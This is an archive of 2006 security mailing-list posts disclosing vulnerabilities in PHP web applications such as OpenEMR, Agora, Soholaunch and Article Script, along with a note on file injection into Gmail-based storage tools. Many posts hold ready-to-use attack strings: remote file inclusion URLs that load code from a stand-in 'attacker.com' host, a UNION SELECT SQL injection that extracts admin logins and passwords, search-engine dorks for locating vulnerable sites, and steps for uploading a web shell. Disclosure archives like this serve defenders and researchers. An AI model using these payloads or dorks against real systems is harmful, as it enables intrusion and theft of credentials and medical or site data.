- /public/code/cp_newsletter.php?nlmsg_nlcatid=[sql]
- /public/code/cp_newsletter.php?choosed_language=[sql]
- /public/code/cp_links.php?links_category=[sql]
- /public/code/cp_links.php?choosed_language=[sql]
- /public/code/cp_contact_us.php?choosed_language=[sql]
- /public/code/cp_show_ec_products.php?product_category_id=[sql]
- /public/code/cp_show_ec_products.php?product_category_id=[sql]
- /public/code/cp_show_ec_products.php?order_field=[sql]
- /public/code/cp_login.php?choosed_language=[sql]
- 
/public/code/cp_users_online.php?order_field=cpsession_expiry&submitted=1&firstrow=[sql]
- /public/code/cp_codice_fiscale.php?choosed_language=[sql]
- /public/code/cp_links_search.php?orderdir=[sql]


full path disclosure =
- /public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main
- /public/code/cp_show_ec_products.php?order_field[]=
- /public/code/cp_show_page_help.php?hp[]=

global risk = hight

laurent gaffié & benjamin mossé
http://s-a-p.ca/
[EMAIL PROTECTED]


Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-11-06 Thread Jerome Athias

3APA3A a écrit :

Dear [EMAIL PROTECTED],

NULL pointer dereference is not exploitable to code execution by itself.

  

Hi,

you should be interested by this
http://metasploit.blogspot.com/2006/08/putting-fun-in-browser-fun.html

+ a little tool https://www.securinfos.info/outils-securite-hacking/uSEH.rar

/JA



Mail Drives Security Considerations

2006-11-06 Thread darkz . gsa
Mail Drives Security Considerations
===

Author: Attila Gerendi (Darkz)
Date: November 03, 2006 


 There are more "mail drive" solutions available like "GMail Drive", "GSpace", 
"Gmail FS", etc.. These systems are built to store ordinary files in email 
accounts (usually gmail because it's free 2Gb++ space). 

 In some of these solutions the files and folders usually are stored as 
attachments in a special email. The file system does not have FAT (File 
Allocation Table) and the informations regarding the name and path of the 
files/folders are stored in the email SUBJECT field. Additionally there is no 
mechanism to filter these emails.
 
 So the problem is the remote attacker can shout blindly emails which describe 
a file or folder in this file systems and manipulate or inject files into that 
file system. This may be used for a new spam type or to inject 
undesirable/malicious files into someone's file collection. At the first sight 
this can not be worse then plain email spamming, however because this concept 
is extending the email use if no sanitation will be included then it will 
extend the spam use as well, some malicious people will find out new malicious 
solutions for particular or generic situations.

A few examples are described below, other may exist.

1. viksoe's GMail Drive shell extension
---

- file injection. You can inject files into the "GMail Drive file 
system" by sending email with Subject: "GMAILFS: /new_filename.txt [13;a;1]" 
and "new_filename.txt" as attachment. However if the sender is not "self" then 
the filename will be displayed with red color. The sender email address can be 
spoofed.

- folder creation. You can create new folder by sending email with 
Subject: "GMAILFS: /new_folder/. [14;a;1]"

- rewrite file contains. You can overwrite file displayed content 
sending email with Subject: "GMAILFS: /existing_path/existing_filename.txt 
[13;a;1]" and "filename.txt" as attachment. However if the sender is not "self" 
then the extension will display 2 files with the same name but both will have 
the same new content.



2. Gmail File Space(GSpace) by Rahul Jonna 
--

- file injection. You can inject files into the "GSpace file system" by 
sending email with Subject: "GSPACE|new_filename.txt|2174|1|1|1|gs:/ d$" and 
putting "new_filename.txt" and "metadata.txt" as attachment. However the 
interface will fill the "from" information with the sender email address. The 
sender email address can be spoofed.

- folder creation. You can create new folder by sending email with 
Subject: "GSPACE|test/|-135|1|1|0|gs:/ d$" and "blank.txt" and "metadata.txt" 
as attachment. However the interface will fill the "from" information with the 
sender email address. The sender email address can be spoofed.


Solution:
-
  there are more possible solutions to filter unwanted content, such as 
inserting unpredictable id-s in the emails, message signing, but none (in my 
opinion) which can offer backward compatibility.
 



[ECHO_ADV_60_2006] OpenEMR <=2.8.1 Multiple Remote File Inclusion Vulnerability

2006-11-06 Thread erdc
---
[ECHO_ADV_60$2006] OpenEMR <=2.8.1 Multiple Remote File Inclusion Vulnerability
---

Author  : Dedi Dwianto a.k.a the_day
Date Found  : November, 01nd 2006
Location: Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv60-theday-2006.txt
Critical Lvl: Highly critical
Impact  : System access
Where   : From Remote
---

Affected software description:


Application : OpenEMR
version : <=2.8.1
URL : http://www.oemr.org

OpenEMR is Open Source electronic medical record and medical practice 
management software. 
OpenEMR is best described as a "system" of programs. The main OpenEMR program 
consists of the electronic
health records and scheduling software. 
OpenEMR can also be configured for insurance billing with FreeB, accounting 
with SQL-Ledger,
and access controls with php-GACL.
---

Vulnerability:
~~

I found vulnerability in interface/billing/billing_process.php
---interface/billing/billing_process.php-



Proof Of Concept:
~~~

http://target.com/[OpenEMR-path]/interface/billing/billing_process.php?srcdir=http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/interface/new/new_patient_save.php?srcdir=http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/login.php?srcdir=http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/library/translation.inc.php?GLOBALS[srcdir]=http://atacker.com/inject.txt?



Solution:
~~~

- Sanitize variable $srcdir affected files.
- Turn off register_globals

Timeline :
~

01 - 11 - 2006 bugs found
01 - 11 - 2006 vendor contacted
07 - 11 - 2006 public disclosure

---

Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ [EMAIL PROTECTED]
~ #aikmel - #e-c-h-o @irc.dal.net

---
Contact:

 EcHo Research & Development Center
 the_day[at]echo[dot]or[dot]id
 
 [ EOF ]--


[ECHO_ADV_59_2006]Agora 1.4 RC1 "$_SESSION[PATH_COMPOSANT]" Remote File Inclusion Vulnerability

2006-11-06 Thread erdc
---
[ECHO_ADV_59$2006]Agora 1.4 RC1  "$_SESSION[PATH_COMPOSANT]" Remote File 
Inclusion Vulnerability
---

Author  : Dedi Dwianto a.k.a the_day
Date Found  : November, 01nd 2006
Location: Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv59-theday-2006.txt
Critical Lvl: Highly critical
Impact  : System access
Where   : From Remote
---

Affected software description:


Application : Agora
version : 1.4 RC1
URL : http://www.agora.gouv.fr

Based on the free software Spip, Agora is a free software of management of 
contents for 
Internet developed in php, which makes it possible to put in place and to 
manage quickly 
and with lower cost of the Internet sites, Intranet or extranet.
---

Vulnerability:
~~

I found vulnerability in modules/Mysqlfinder/MysqlfinderAdmin.php
--modules/Mysqlfinder/MysqlfinderAdmin.php--

http://target.com/[agora-1.4-path]/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=http://attacker.com/inject.txt?


Solution:
~~~

- Insert new line code :
  ...
  include_once 'MysqlfinderParam.inc';
  ...
  
  Before include_once($_SESSION["PATH_COMPOSANT"]."Commun/Template.inc")

- Turn off register_globals
- Turn off display_error to Hide Full Path Error

Timeline :
~

01 - 11 - 2006 bugs found
01 - 11 - 2006 vendor contacted
07 - 11 - 2006 public disclosure

---

Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ [EMAIL PROTECTED]
~ #aikmel - #e-c-h-o @irc.dal.net

---
Contact:

 EcHo Research & Development Center
 the_day[at]echo[dot]or[dot]id
 
 [ EOF ]--


Re: @cid stats v2.3 File Include

2006-11-06 Thread Heiko Wundram
Am Sonntag, 5. November 2006 23:33 schrieb mahmood ali:
> 

Completely bogus.

If you look closely, the corresponding code in install.php3 is used to create 
a config file which contains a statement setting $repertoire (from a user 
input, so here is your injection attack for an install script, which is 
pretty much what you want, I'd guess). Anyway, if you don't delete 
install.php3 after the installation is complete, it's your own fault.

-- 
--- Heiko Wundram.

x|encon Support der
Gehrkens.IT GmbH

FON 0511-59027955 | http://www.gehrkens.it
FAX 0511-59027956 | http://www.xencon.net

Gehrkens.IT GmbH
Mailänder Strasse 2
30539 Hannover


pgpnqsPtFQ9Bu.pgp
Description: PGP signature


[ECHO_ADV_58_2006]Cyberfolio <=2.0 RC1 $av Remote File Inclusion Vulnerability

2006-11-06 Thread erdc
---
[ECHO_ADV_58$2006]Cyberfolio <=2.0 RC1 $av  Remote File Inclusion Vulnerability
---

Author  : Dedi Dwianto a.k.a the_day
Date Found  : November, 01nd 2006
Location: Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv58-theday-2006.txt
Critical Lvl: Highly critical
Impact  : System access
Where   : From Remote
---

Affected software description:


Application : Cyberfolio
version : <=2.0 RC1
URL : http://www.cyberfolio.org

---

Vulnerability:
~~

I found vulnerability in script view.php
--view.php---

http://target.com/cyberfolio/portfolio/msg/view.php?av=http://attacker.com/inject.txt?
http://target.com/cyberfolio/portfolio/admin/incl_voir_compet.php?av=http://attacker.com/inject.txt?


Solution:
~~~

- Sanitize variable $av affected files.
- Turn off register_globals

Timeline :
~

01 - 11 - 2006 bugs found
01 - 11 - 2006 vendor contacted
07 - 11 - 2006 public disclosure

---

Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ [EMAIL PROTECTED]
~ #aikmel - #e-c-h-o @irc.dal.net

---
Contact:

 EcHo Research & Development Center
 the_day[at]echo[dot]or[dot]id
 
 [ EOF ]--


[ECHO_ADV_57_2006]Soholaunch Pro <=4.9 r36 Multiple Remote File Inclusion Vulnerability

2006-11-06 Thread erdc
---
[ECHO_ADV_57$2006]Soholaunch Pro <=4.9 r36 Multiple Remote File Inclusion 
Vulnerability
---

Author  : Dedi Dwianto a.k.a the_day
Date Found  : October, 31th 2006
Location: Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv57-theday-2006.txt
Critical Lvl: Highly critical
Impact  : System access
Where   : From Remote
---

Affected software description:


Application : Soholaunch Pro Edition
version : <=4.9 r46
URL : http://www.soholaunch.com

Soholaunch Pro Edition is a software product that makes it easy for people of 
all experience levels to create 
and maintain a great website. It reins-in the hard parts of building a website 
and presents them a way that the 
non-geek can understand and control
---

Vulnerability:
~~

I found vulnerability in script shared_functions.php
--shared_functions.php---

http://target.com/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://attacker.com/inject.txt?
http://target.com/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://attacker.com/inject.txt?


Solution:
~~~

- Sanitize variable $_SESSION['docroot_path'] affected files.
- Turn off register_globals

Timeline :
~

31 - 10 - 2006 bugs found
31 - 10 - 2006 vendor contacted
07 - 11 - 2006 public disclosure

---

Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ [EMAIL PROTECTED]
~ #aikmel - #e-c-h-o @irc.dal.net

---
Contact:

 EcHo Research & Development Center
 the_day[at]echo[dot]or[dot]id
 
 [ EOF ]--


PHP Rapid Kill All Version File Injection

2006-11-06 Thread null_hack
Discovered By:Null
PHP Rapid Kill All Version File Injection
U Can Upload Your Shell Code To Rapidshare.de and then copy link to
the Link to Download text box of the web app
then your shell Uploaded To this URL
www.site.com/rapidpath/yourfile.php
Download App:http://www.filefactory.com/file/f14862/
Email:null_hack(at)yahoo(dot)com
Greetz to
Gamma Security Team
www.gammahack.com
www.nullak.com


Stanford university SCARF user editing

2006-11-06 Thread navairum
vendor:Someone at Stanford university
site:http://sourceforge.net/projects/scarf/

vuln:
There is no admin check on the file generaloptions.php So anyone can go in and 
make some changes.  One thing to do would be create a user, then go into 
general options and change your user to an admin.  You can also change the 
background, title, and css page through this file.
-navairum


Article Script v1.*and v1.6.3 Sql injection

2006-11-06 Thread liz0
Article Script v1.*and v1.6.3 Sql injection

Script Name :Article Script

Home Page:www.articlescript.org

Bug Founder :Liz0ziM

Mail:[EMAIL PROTECTED]

Baba Kimdir? Tabiki Liz0ziM



:D

 

http://www.victim.com/articles/rss.php?category= ' sql İnjection

 

Example:

 
http://www.victim.com/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*

 

 

 

 admin4521title> --> Admin name :admin4521

 

http://www.victim.com/articles/cs1120/page_1/link>  --> Admin 
password cs1120

 

 

Dork:


"Powered by Article Script"


":: Article Script - New User Article ::"

 

intitle:":: Article Script -"

 

"Last Articles::"

 

 

Greatz My all friend 

 

Source: http://www.blogcu.com/Liz0ziM/1312100/


@cid stats v2.3 File Include

2006-11-06 Thread mahmood ali

###
@cid stats v2.3  File Include
###
Source Code:

http://www.comscripts.com/jump.php?action=script&id=1115
###
Vulnerable Code:_

install.php3
###
In Line 41 :_

require("'.$repertoire."/".'stats_fonctions.php3
###
Exploit :_

http://www.VicTim.com/[EMAIL PROTECTED]/install.php3?repertoire=ShElL.txt?
###

Discoverd By :  Mahmood_ali
###

Special Greetings :_ Tryag-Team  &  4lKaSrGoLd3n-Team  > WwW.DwRaT.CoM & 
WwW.Tryag.CoM


###

_
Windows Live™ Messenger has arrived. Click here to download it for free! 
http://imagine-msn.com/messenger/launch80/?locale=en-gb